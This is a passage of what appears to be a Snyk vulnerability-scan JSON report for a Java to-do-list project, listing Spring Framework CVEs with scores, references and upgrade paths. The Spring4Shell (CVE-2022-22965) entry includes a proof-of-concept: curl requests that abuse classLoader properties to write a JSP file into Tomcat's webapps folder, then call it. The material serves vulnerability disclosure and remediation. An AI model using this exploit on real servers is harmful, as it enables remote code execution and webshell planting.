For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.20.RELEASE", + "org.springframework:spring-expression@5.2.20.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + 
"name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:22.626014Z" + }, + { + "type": 
"secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": "0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": 
"2023-03-23T12:37:13.052190Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.23.RELEASE", + "org.springframework:spring-expression@5.2.23.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + "[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + 
"cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.24.RELEASE", + "org.springframework:spring-expression@5.2.24.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + "title": "LunaSec Blog" + }, + { + "url": 
"https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" + }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": 
"Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). 
\r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.20.RELEASE", + "org.springframework:spring-beans@5.2.20.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob Ryan" + ], + 
"semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + "[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## 
Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.22.RELEASE", + "org.springframework:spring-beans@5.2.22.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling of Case 
Sensitivity", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-11T09:47:26.822810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-context" + 
}, + "publicationTime": "2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.21.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": 